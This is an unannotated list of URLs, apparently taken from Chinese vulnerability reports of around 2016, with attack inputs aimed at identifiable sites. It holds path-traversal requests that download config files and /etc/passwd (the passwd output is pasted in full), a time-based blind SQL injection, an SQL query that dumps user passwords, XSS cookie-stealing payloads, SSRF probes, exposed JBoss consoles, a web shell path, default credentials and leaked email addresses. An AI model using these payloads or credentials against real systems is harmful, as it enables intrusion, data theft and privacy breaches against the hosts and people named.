http://www.wenji99.com/dlq9J15DshW5f http://univ.zte.com.cn/ztetrain/mngdefault.aspx?id=07 https://survey.alipay.com/feed.html http://bbs.yunsuo.com.cn/data/ http://**.**.**.**/index.action http://j.m.leju.com/notice/detail/?id=15842 http://**.**.**.**//index.php?m=Index&a=index&cityname=suzhou http://yjaq.51taoshi.com/fore/zy/zyList.action?aid=921&kws=&p=80&tid=0 http://zizhu.dlut.edu.cn/SurveyPage.aspx?pollid=15 http://eggserver.mumayi.com/v16/userstatus.php http://www.shiyanbar.com/experiment-course/detail/305 http://**.**.**.** http://**.**.**.**/force_download.php?file=../../force_download.php http://**.**.**.**/force_download.php?file=../../_common/site_config.php http://**.**.**.**/.svn/entries http://**.**.**.**/ http://**.**.**.**/ http://wq.jd.com/mcoss/mportal/show?tabid=6&tpl=7&PTAG=17012.4.2&ptype=4 http://202.108.145.199/helpdesk http://www.daoyoudao.com/job_BJ*_121.html http://www.ftimes.info/message/123.php?id= http://www.ftimes.info/message/messageshow.php?newsid= http://www.ftimes.info/message1/123.php?id= http://www.ftimes.info/message1/messageshow.php?newsid= http://www.ftimes.info/shenghuo_folder/shenghuo.php?bigtype= http://www.ftimes.info/shoucang_folder/shoucang_sanjinews.php?pageno= http://www.ftimes.info/shoucang_message/123.php?id= http://www.ftimes.info/shoucang_message/messageshow.php?newsid= http://www.ftimes.info/sousuo_search.php?neirong=&pageno= http://www.ftimes.info/wochi_zhangtu/showtu.php?id= http://www.ftimes.info/wochi_zhangtu/tiao1.php?id= http://www.ftimes.info/wochi_zhangtu/tiao2.php?id= http://www.ftimes.info/xinwen_erji.php?bigtype= http://**.**.**.**/site_item_content_2.php?site_map_item_id=197 http://**.**.**.**/site_item_content_2.php?site_map_item_id=766 http://**.**.**.**/site_item_content_2.php?site_map_item_id=394http://**.**.**.**/site_item_content_2.php?site_map_item_id=197 http://**.**.**.**/cms/webapp/preview.jsp?ColumnID=147&TID=20130729164934754639746 http://**.**.**.**/new2014/temp/list.php?tid=1&colid=2 
http://**.**.**.**/bugs/wooyun-2015-0155643 http://**.**.**.**/web/user/login.asp http://**.**.**.**/sys/login/login.jsp http://**.**.**.**/BrowseServlet?szsat.trancode=401153&szsat.errpage=/WEB-INF/web.xml&szsat.normalpage=/WEB-INF/web.xml http://**.**.**.**/BrowseServlet?szsat.trancode=401153&szsat.errpage=/WEB-INF/applicationContext.xml&szsat.normalpage=/WEB-INF/web.xml http://**.**.**.**/LlfxServlet?lmbh=znjl_jbts&pagename=znjl&url=/WEB-INF/web.xml&errpage=/WEB-INF/web.xml http://**.**.**.**/LlfxServlet?lmbh=znjl_jbts&pagename=znjl&url=/WEB-INF/web.xml&errpage=/WEB-INF/html.tld http://mail.cgdc.com.cn http://**.**.**.**/userc/yuyueupdate.aspx?id=66770 http://**.**.**.**/dl.aspx http://crmail.crc.com.cn/ crmail.crc.com.cn/Aa123456 http://www.59.cn/domain/search.asp http://wooyun.org/bugs/wooyun-2016-0168384 http://122.96.58.36/merchant http://202.108.145.241:8080/ index.php/symbol/ordershow?id=1 http://act.jshdev.jushanghui.com/login/index.do?timeOut=ture http://**.**.**.**/bugs/wooyun-2015-0138409 http://ehr.cofco.com:8001/ http://ehr.cofco.com:8001/doc/personBasicInfo.do?personId=000003.18011302 http://ehr.cofco.com:8001/doc/personBasicInfo.do?personId=000003.18011301 http://ehr.cofco.com:8001/doc/personBasicInfo.do?personId=000003.18011303 http://ehr.cofco.com:8001/self/personInfoEdit.do?fk=000003.18011302 http://ehr.cofco.com:8001/self/personInfoEdit.do?fk=000003.18011302 http://**.**.**.** http://**.**.**.** http://**.**.**.** shell:http://**.**.**.**/upload/16/0112/m56946a4f37b101452567119.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/index.php/Public/checklogin http://i.emao.com/131676/friend/list_1_1.html http://**.**.**.**/waps/shop_order?id=12215 http://**.**.**.**/waps/shop_order?id=12214 http://**.**.**.**/waps/shop_order?id=12213 http://thrd.cofco.com http://**.**.**.**/login_.htm http://**.**.**.**/ http://**.**.**.** http://m.baidu.com存在XSS http://bbsm.g.baofeng.com/data/avatar/index.php http://**.**.**.**/ 
http://bugs.security.wooyun.org/58624f6864515a4c37746a7573594f4e37467a7262773d3d?2072b2e0cbbb7198e35ebddbfd38040d&ua=&ut=iPhone6s.0&uatype=iOS9.2 http://**.**.**.**:8800/cn/download.aspx?t=46 http://**.**.**.**/cn/download.aspx?t=46 http://biz.finance.sina.com.cn/stock/new_stock.php?code_list=031005,031006,580014,580021,580022,580024,580025,580026,580027,580017,580016&default=580027 http://**.**.**.**:80/NewWanbu/App/NewHome/index.php/Index/moreSpecial/typeid/9 http://bpm.tsingtao.com.cn:8080/thirdcost/ http://tip.tsingtao.com.cn:7041/TsingtaoPortalWeb/appmanager/portlets/common/comkm/UserShortLinkSetup.jsp# http://tip.tsingtao.com.cn:7041/TsingtaoPortalWeb/appmanager/logs/logQuery.jsp?startDate=2015-12-11&endDate=2016-01-11&endDate=%E6%9F%A5+%E8%AF%A2 http://tip.tsingtao.com.cn:7041/TsingtaoPortalWeb/portlets/pendingWork/morePendingWork.jsp?portletLabel=WS_YXZXJS_MAIN_DYSY&linkName=%3Cscript%3Ealert%281%29%3C/script%3E http://m.shop.zymk.cn http://**.**.**.**/kjxxw.php?id=113550 http://**.**.**.** http://**.**.**.**//services/ http://**.**.**.**//services/MobileService?wsdl为例 http://222.222.219.251:2086/doc/page/login.asp http://config.pinyin.sogou.com/api/indexshare/share.php?reurl=/%22%20onerror=%22document.write%28document.cookie%29 http://**.**.**.**/subpage_qy.aspx?typeid=1 http://**.**.**.**:8080/ https://github.com/cj4777/My-emacs.d/blob/fcb08c6bf17f84de004e77c3b20a931c76845ea6/custom.el www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200089&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=F584F8DEE3492219E71DBE4939C12F9 www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200098&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=8E1EBB71226D0322AB7E1ACD2DB7FAAA www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200140&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=AD00126B33B3A61570A14251BBD8B137 
www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200113&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=A5B30D4D28406ECDC568DE9C364EB65E www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098051&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=7B7182B2D3D5FC0D44B7777C9A162A8F www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098134&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=45FC12B7B62FA7CAB0E8530C08DC941A www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098008&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=3C52B16E7F1D4C2274AC6A7DB0CDC56B www.xyz.cn/api/user/get?loginId=200101&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=2D23DC841F2F5616867024FDF185703E www.xyz.cn/api/user/get?loginId=200091&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=E9C0909F22CBC5E6190A52F91B5DCF1C www.xyz.cn/api/user/get?loginId=200092&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=02043C74D504604CB64FAE5DDE5D7BC2 http://univ.zte.com.cn/public/DataDown.aspx?EltNo=1103 http://oa.cib-fund.com.cn/ http://oa.cib-fund.com.cn/sysinterface/extpage/cssroot.jsp http://oa.cib-fund.com.cn//ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,123442105,LOGONPASS%20from%20SYSUSER http://**.**.**.** http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../index.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/common.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../chinese_trad/03_support/down.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../index.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/common.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/database/DB_class.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/sql/Mysql_class.php 
http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../admin/index.php http://ssp.daoyoudao.com http://**.**.**.** http://**.**.**.**/down.php?f=../../down.php http://**.**.**.**/down.php?f=../../config.php http://**.**.**.**/down.php?f=../../../../../../../etc/passwd nobody:x:99:99:Nobody:/:/sbin/nologin mail:x:8:12:mail:/var/spool/mail:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin mailman:x:32000:962::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell cpaneleximfilter:x:32003:967::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell mysql:x:301:217:MySQL server:/var/lib/mysql:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin root:x:0:0:root:/root:/bin/bash rwdporcom:x:1809755:1809755::/home/rwdporcom:/bin/bash www.kjds.cn http://**.**.**.** http://**.**.**.**/down.php?file=down.php http://**.**.**.**/down.php?file=include/conn.php http://**.**.**.**/ http://**.**.**.**///messager/users.data http://**.**.**.** 
http://**.**.**.**/down.php?hDFile=../../down.php http://**.**.**.**/down.php?hDFile=../../include/php_script/common.php http://**.**.**.**/ http://**.**.**.**/down.php?hDFile=../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/false mabubu:x:501:524::/Services/Files/upload_files/mabubu:/bin/false sobdeall:x:502:524::/Services/Files/upload_files/sobdeall:/bin/false sisso:x:503:524::/Services/Files/upload_files/sisso:/bin/false mabubu_test:x:504:524::/Services/Files/upload_files_test/mabubu:/bin/false sisso_test:x:505:524::/Services/Files/upload_files_test/sisso:/bin/false kaloo:x:506:524::/Services/Files/upload_files/kaloo:/bin/false teaman:x:507:524::/Services/Files/upload_files/teaman:/bin/false booklife:x:508:524::/Services/Files/programing/booklife/upload_files:/bin/false kaloo_test:x:509:524::/Services/Files/upload_files_test/kaloo:/bin/false ponijohn:x:510:524::/Services/Files/programing/ponijohn/upload_files:/bin/false teaman_test:x:511:524::/Services/Files/programing-test/teaman/upload_files/teaman:/bin/false bestpals:x:512:524::/Services/Files/programing/bestpals/upload_files:/bin/false 
lilliputiens:x:513:524::/Services/Files/programing/lilliputiens/upload_files:/bin/false soapmaker:x:514:524::/Services/Files/programing/soapmaker/upload_files/soapmaker:/bin/false lilliputiens_test:x:515:524::/Services/Files/programing-test/lilliputiens/upload_files/lilliputiens:/bin/false minihope:x:516:524::/Services/Files/upload_files/minihope:/bin/false ymr:x:517:524::/Services/Files/programing/ymr/upload_files/ymr/:/bin/false ymr_test:x:518:524::/Services/Files/programing-test/ymr/upload_files/ymr:/bin/false sisso-pos:x:519:524::/Services/Files/fonlego-pos/sisso:/bin/false shangyu:x:520:524::/Services/Files/shangyu:/bin/false masmas:x:521:524::/Services/Files/programing/masmas/upload_files/masmas:/bin/false alatech:x:522:524::/Services/Files/programing/alatech/upload_files/alatech:/bin/false minihope-pos:x:523:524::/Services/Files/programing/minihope/upload_files/minihope/pos_stock:/bin/false minihope-mstc:x:524:525::/Services/Files/programing/minihope/upload_files/minihope/minihope-mstc:/bin/false cht:x:525:526::/Services/Files/programing/cht:/bin/false geagle:x:526:524::/Services/Files/programing/geagle/upload_files:/bin/false joederek:x:527:527::/home/joederek:/bin/bash gennies:x:528:524::/Services/Files/upload_files/gennies:/bin/false gennies_wp_maternity:x:529:524::/Services/Files/programing-wp/gennies/maternity:/bin/false gennies_wp_motherhood:x:530:524::/Services/Files/programing-wp/gennies/motherhood:/bin/false gennies_wp_pregnancy:x:531:524::/Services/Files/programing-wp/gennies/pregnancy:/bin/false lakeinsports:x:532:524::/Services/Files/programing/lakeinsports/upload_files/lakeinsports:/bin/false gennies_wp_treasuremap:x:533:533::/Services/Files/programing-wp/gennies/treasuremap:/bin/false cani:x:534:524::/Services/Files/upload_files/cani:/bin/false alatech-en:x:575:524::/Services/Files/upload_files/alatech-en:/bin/false goodhon:x:576:524::/Services/Files/upload_files/goodhon:/bin/false 
zongtai-www:x:577:524::/Services/Files/programing/zongtai-www:/bin/false gennies_wp_mommy-knowledge:x:578:524::/Services/Files/programing-wp/gennies/mommy-knowledge:/bin/false mombabyfun:x:579:524::/Services/Files/upload_files/mombabyfun:/bin/false mombabyfun-pos:x:580:524::/Services/Files/upload_files/mombabyfun/pos:/bin/false lamalama:x:581:581::/Services/Files/upload_files/lamalama:/bin/false lamalama-return711:x:582:524::/Services/Files/upload_files/lamalama/return711:/bin/false buddybuddy-pos:x:583:583::/Services/Files/programing/buddybuddy/upload_files/buddybuddy/pos:/bin/false buddybuddy:x:584:584::/Services/Files/upload_files/buddybuddy:/bin/false pet_health_food:x:585:585::/Services/Files/programing-wp/buddybuddy/pet_health_food:/bin/false dollbao:x:586:524::/Services/Files/upload_files/dollbao:/bin/false sobdeall-pos:x:587:524::/Services/Files/upload_files/sobdeall/pos:/bin/false http://202.109.103.225:81 http://kfhz.daoyoudao.com http://school.51taoshi.com/study/index/classRoomForXinli.action?search.field02=-1 http://a6.gykghn.com:8080/yyoa/ http://**.**.**.** http://**.**.**.**/phone/sfnr.jsp?id=3741 http://www.kaiyuanhotels.com/web/hotel/searchHotelList.htm?hotelUtil.arrDate=1988-11-06&hotelUtil.city.name=%25E8%2587%25AA%25E8%25B4%25A1%25E5%25B8%2582&hotelUtil.depDate=1951-02-25&hotelUtil.keyword=e http://**.**.**.**/tongji/xininfo.aspx?id=-2147052242 http://**.**.**.**/tongji/xininfo.aspx?id=-2147052242 http://**.**.**.**/tongji/xininfo.aspx?id=-214 http://**.**.**.** http://**.**.**.** http://**.**.**.**/e-go/news_detail.asp?CateID=1&NewsID=29156 http://111.204.39.21:8080/seeyon/index.jsp http://111.204.39.21:8080/seeyon/management/index.jsp http://121.201.7.17:3000/cell-list.html http://sy.ztgame.com/index.php?r=site/login http://www.ec.ccoo.cn/stat2.asp?referer=e&screenwidth=1024&siteid=1&style= http://www.wowozhe.com/jingyans/569.html#comment_sendPart这是主站一篇文章评论处。对xss进行简单过滤如 http://114.242.74.194/login/Login.jsp?logintype=1 
http://114.242.74.194/yjh.jsp jdbc:oracle:thin:@127.0.0.1:1521:orcl hh:mm:ss http://114.242.74.194/messager/users.data http://**.**.**.**/PlantInfo/species-name.php?code=524 http://**.**.**.**/chi/taibnet_species_detail.php?name_code=382205 http://114-svc.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL http://hotelwsqq.vip.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL http://**.**.**.**/faculty/index.php?piName=rjchein http://**.**.**.**/Articles_shows.php?artid=1371 https://**.**.**.**/ipv4/**.**.**.** http://**.**.**.**/catalog/specialist.php?id=1 https://xx.xxx.xxx.xx9:9043/ibm/console/。 http://dxxx.xxxx.xx/。 jdbc:oracle:thin:@xxx.xx.x.63:1521/xxxxdb,用户名为xxx5,数据库为oracle http://xx.xxx.xxx.xx3/xxx/xxxxxxxx/xxx/xxxxx!xxxxx.action。 http://**.**.**.**:8080/zfcx/rys_admin/admin_xx/admin_info_gr_tj.asp http://oa.beequick.cn http://122.194.12.53:8080/vmain/login.jsp http://122.194.12.53:8080/ServiceAction/com.velcro.base.DataAction?sql=1 http://www.rufengda.com/page/user/register.jsp http://**.**.**.**/introd_show.php?Artctxt_id=1398 http://**.**.**.**/sys/read_attach.php?id=156648 www.huawei.com http://www.huawei.com http://**.**.**.**/listProduct.aspx?SubjectType=1&pageIndex=1&pageSize=20 http://www.del***.com/SubCategory.aspx?SubjectType=2&pageIndex=1&pageSize=20 http://yishi***.com/listProduct.aspx?SubjectType=1&pageIndex=1&pageSize=20 http://yingzhang.izuche.com:8087/BaseDataJson.asmx/GetStorebyDistrictID BaseDataJson.asmx/GetStorebyDistrictID com:8087 http://dsp.gome.com.cn/trp/material/# http://**.**.**.**/page_teacher_o.php?id=17 http://oa.wasu.com.cn:8088/ http://wx.weaver.com.cn/download下载该系统进行代码审计的时候突然想到一个猥琐的思路:能否使用默认密码直连数据库? 
http://**.**.**.**/index3.php?newsId=2413 http://122.97.132.92:8080/ http://122.97.132.92:8080/jmx-console http://122.97.132.92:8080/invoker/JMXInvokerServlet http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-x-up-to-5-0-7%E8%BF%9B%E4%B8%80%E6%AD%A5%E5%88%A9%E7%94%A8-html.html http://admin.cngames.cn/ http://**.**.**.**/article1.php?lang=1&id=7 http://**.**.**.**/chinese/1_about/teacher_detail.php?ID=2&TID=2 http://103.235.46.83/index.php/site/news_view?id=40 http://**.**.**.**/ctd/news_detail.php?mid=3&news_id=1 http://b2c.huan.tv//index/choose?gid=693&type_id=11 http://**.**.**.**:8080/articles/articles_viewArticle.action?id=4ef56c01-33a5-478b-9f4a-4a067b052628 http://**.**.**.**/web/10636 http://91082030.k388.opensrs.cn/data/data.mdb http://91082030.k388.opensrs.cn/index.asp http://**.**.**.**/Main/Login.asp http://**.**.**.**/ http://121.193.130.83:7001/main.action http://passport.ku6.com/v3-login.htm?redirect=http%3A%2F%2Fv.ku6.com%2Flogin有验证码但是可以绕过,就是抓包之后输入正确一直就会正确,用户名密码均明文传输的: www.729894983@qq.com www.532821866@qq.com www.758655449@qq.com www.513374460@qq.com www.375123670@qq.com www.121585444@qq.com www.sunyong@qq.com www.lishijie220@qq.com www.qinhongge@qq.com www.799342228@qq.com www.654421472@qq.com www.409534427@qq.com www.350948926@qq.com www.350948926@qq.com www.liuhe79.51@qq.com www.nba5757124.cn@qq.com www.735898200@qq.com www.892174208@qq.com http://**.**.**.**/about.asp?id=35 http://**.**.**.**/article_info.asp?id=5593 http://**.**.**.**/newsinfo.asp?id=430 http://**.**.**.**/PhotoView.asp?id=1226 http://**.**.**.**/ShowNews.asp?id=1059 http://**.**.**.**/ShowNews.asp?id=1057 http://**.**.**.**/ShowNews.asp?id=960 http://**.**.**.**/view.asp?id=157 http://**.**.**.**:8080/new/onews.asp?id=797 http://**.**.**.**/newss.asp?id=227 http://**.**.**.**/mucc/about.asp?id=60 http://**.**.**.**/Article.asp?id=2923 http://**.**.**.**/show.asp?id=356 http://**.**.**.**/tpshow.asp?id=82 http://**.**.**.**/mucc/shownews.asp?id=1395 
http://**.**.**.**/mucc/tupianshow.asp?id=190 http://**.**.**.**/news_show.asp?id=1687 http://**.**.**.**/Show.asp?id=733 http://**.**.**.**/news_content.asp?id=153 http://**.**.**.**/news_content.asp?id=152 http://**.**.**.**/list_news.asp?id=752&sort_id=761清涧县拆家坪镇人民政府 http://**.**.**.**/showxw.asp?id=300 http://**.**.**.**/nzcms_list_news.asp?id=671&sort_id=657 http://**.**.**.**/aboutus.asp?id=23 http://**.**.**.**/user/index.asp?id=4706 http://**.**.**.**/user/index.asp?id=4708 http://**.**.**.**/jgjj.asp?id=398 http://**.**.**.**/ShowNews.asp?id=98 http://**.**.**.**/news_zw.asp?id=14465&classid=14 http://**.**.**.**/aDetail.asp?ID=949 http://**.**.**.**/nzcms_list_news.asp?id=674&sort_id=658 http://**.**.**.**/Detail.asp?id=7891 http://**.**.**.**/News_Blank.asp?ID=2330 http://**.**.**.**/show_news.asp?id=5827 http://**.**.**.**/Html/Links.Asp?Id=25 http://**.**.**.**/type.asp?ID=1 http://**.**.**.**/cjcyxcs.asp?id=78 http://**.**.**.**/nzcms_list_news.asp?id=668&sort_id=657 http://**.**.**.**/newsInfo.asp?id=827&cid=52 http://**.**.**.**/detail.asp?id=15870 http://**.**.**.**/LstNewsInfo.asp?tt=14&ss=15&Id=1029 http://**.**.**.**/LstNewsInfo.asp?TT=9&Id=1126 http://**.**.**.**/LstNewsInfo.asp?tt=8&ss=8&Id=1198 http://**.**.**.**/djinfo.asp?id=299 http://**.**.**.**/yb.asp?id=82&artid=25059 http://**.**.**.**/news/new.asp?id=1743 http://**.**.**.**/show.asp?id=849 http://**.**.**.**/list.asp?id=317 http://**.**.**.**/list_news.asp?sort_id=791&id=784 http://**.**.**.**/list_news.asp?sort_id=793&id=784 http://**.**.**.**/list_news.asp?sort_id=785&id=784 http://**.**.**.**/list_news.asp?sort_id=787&id=784 http://**.**.**.**/nzcms_list_news.asp?id=674&sort_id=658 http://**.**.**.**/nzcms_list_news.asp?id=676&sort_id=658 http://**.**.**.**/nzcms_list_news.asp?id=673&sort_id=658 http://**.**.**.**/company.asp?id=53 http://**.**.**.**/show.asp?Id=673 http://**.**.**.**/show.asp?id=104 http://**.**.**.**/show.asp?id=3784 http://**.**.**.**/article_show.asp?id=9 
http://**.**.**.**/NewsView.asp?id=1382 http://**.**.**.**/Users/GBook/ReadBook.asp?id=35 http://**.**.**.**/qa.asp?id=1 http://**.**.**.**/showtzgg.asp?id=370 http://**.**.**.**/newsShow.Asp?id=1989 http://**.**.**.**/list_news.asp?id=797&sort_id=672 http://**.**.**.**/newslist.asp?id=41 http://**.**.**.**/detail.asp?id=1774 http://**.**.**.**/index_onews.asp?id=2785 http://**.**.**.**/index_onews.asp?id=2717 http://**.**.**.**/page.asp?id=3 http://**.**.**.**/news.asp?id=303&bh=1038 http://**.**.**.**/new_view.asp?id=447 http://**.**.**.**/dwmy/index02_1.asp?id=75 http://**.**.**.**/aDetail.asp?ID=959 http://**.**.**.**/aDetail.asp?ID=949 http://**.**.**.**/disqa.asp?id=2 http://**.**.**.**/infolist.asp?id=1280&big=14&small=67 http://**.**.**.**/show.asp?id=821 http://**.**.**.**/ajax/docshow.asp?id=2140 http://**.**.**.**/FriendSite/FriendSiteUrl.asp?ID=18 http://**.**.**.**/Html/Links.Asp?Id=25 http://**.**.**.**/onews.asp?id=947 http://**.**.**.**/show.asp?id=5372&partid=7&smallid=95 http://**.**.**.**/readnews.asp?id=759 http://**.**.**.**/nzcms_list_news.asp?id=878&sort_id=877 http://**.**.**.**/news_zw.asp?id=14465&classid=14 http://**.**.**.**/news_zw.asp?id=14509&classid=97 http://**.**.**.**/text.asp?id=83082 http://**.**.**.**/tzgg.asp?id=1140 http://**.**.**.**/details.asp?id=137 http://**.**.**.**/showmsg.asp?id=1883 http://**.**.**.**/showmsg.asp?id=1893 http://**.**.**.**/showmsg.asp?id=1877 http://**.**.**.**/pic_news.asp?id=107 http://**.**.**.**/news_show.asp?id=2404 http://**.**.**.**/news_show.asp?id=2517 http://**.**.**.**/Manage/ManageShow.asp?ID=432 http://**.**.**.**/Manage/ManageShow.asp?ID=431 http://**.**.**.**/News/NewsShow.asp?ID=309 http://**.**.**.**/list/view.asp?id=14615 http://**.**.**.**/listvideo.asp?cid=29 http://**.**.**.**/show.asp?id=93 http://**.**.**.**/show.asp?id=907 http://**.**.**.**/nzcms_list_news.asp?id=665&sort_id=656 http://**.**.**.**/display.asp?id=656 
http://**.**.**.**/wenzhang_xx.asp?TypeNumber=00070004&ID=25693 http://**.**.**.**/nzcms_list_news.asp?id=681&sort_id=672 http://**.**.**.**/nzcms_list_news.asp?id=681&sort_id=656 http://**.**.**.**/xxlr1.asp?ID=5171 http://**.**.**.**/nzcms_list_news.asp?id=590&sort_id=586 http://**.**.**.**/article_index.asp?id=389&root=34 http://**.**.**.**/new.asp?id=428&aid=426 http://**.**.**.**/Newss.asp?f=&id=4681 http://**.**.**.**/Newss.asp?f=&id=4540 http://**.**.**.**/showxw.asp?id=300 http://**.**.**.**/showxw.asp?id=1061 http://**.**.**.**/showxw.asp?id=2638 http://**.**.**.**/showxw.asp?id=1593 http://**.**.**.**/showxw.asp?id=3298 http://**.**.**.**/showxw.asp?id=3297 http://**.**.**.**/nzcms_list_news.asp?id=14&sort_id=13 http://**.**.**.**/ShowNews.asp?id=98 http://**.**.**.**/Detail.asp?id=7891 http://**.**.**.**/News_Blank.asp?ID=2330 http://**.**.**.**/show_news.asp?id=5827 http://**.**.**.**/alistclass.asp?id=1 http://**.**.**.**/zfwj/detail.asp?ID=2185 http://**.**.**.**/news_show.asp?id=1687 http://**.**.**.**/zltj.php?act=list&cat_id=33 newzeroblog:123456 admin:admin123 http://**.**.**.**/ContentDetail.aspx?mid=NewsManage&NewsID=83 http://**.**.**.**/ContentDetail.aspx?mid=NewsManage&NewsID=83%27;if%20len%28user%29=5%20waitfor%20delay%20%270:0:3%27-- http://**.**.**.**/ContentDetail.aspx?mid=NewsManage&NewsID=83%27;if%20ascii%28substring%28user,1,1%29%29=105%20waitfor%20delay%20%270:0:3%27-- http://**.**.**.**/ContentDetail.aspx?mid=NewsManage&NewsID=83%27;if%20ascii%28substring%28user,2,1%29%29=115%20waitfor%20delay%20%270:0:3%27-- http://**.**.**.**/frontInformAction.do?method=queryInformList&pdid=123 http://**.**.**.**/admin.php http://gamemanager.uqee.com/ http://61.136.96.16:7000/ www.sqgf.com http://www.sqgf.com/carService/4s/4sxszx.jsp?pageNo=2&pinpai=1 http://www.sqgf.com/carService/tengDi/gzxw.jsp?newstypes=1 http://www.sqgf.com/huantu/4s_1sqtp/4s.jsp?company=1 http://www.sqgf.com/taxiManager/businessTaxi/gmycx.jsp?cartype=1 
http://www.sqgf.com/carService/cyjlb_jchg.jsp?com=1 http://www.sqgf.com/carService/ppgs.jsp?comID=1 http://www.thinkworldshop.com.cn/ http://wooyun.org/bugs/wooyun-2016-0168170 http://oa.tianya.cn/ http://**.**.**.**:9002/jnld/ http://**.**.**.**/consult/consult.aspx?Action=2&radioType=0401 http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-x-up-to-5-0-7%E8%BF%9B%E4%B8%80%E6%AD%A5%E5%88%A9%E7%94%A8-html.html http://122.97.132.98:7001 http://122.97.132.98:7001/1/ http://122.97.132.98:7001/a/ http://122.97.132.98:7001/aa/ http://122.97.132.98:7001/atone/ http://122.97.132.98:7001/atone/ http://122.97.132.98:7001/cdn/ http://122.97.132.98:7001/cK/foot.jsp密码test http://open.egret.com/ http://shop.zymk.cn/index.php/category/index/?page=4&order=shop_price http://**.**.**.**/ODgzZ http://**.**.**.**/ODgzZ http://mail.**.**.**.**/ http://27.115.81.173/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.12:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://27.115.81.172/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.99:7011&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search https://ipcrs.pbccrc.org.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.12:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search 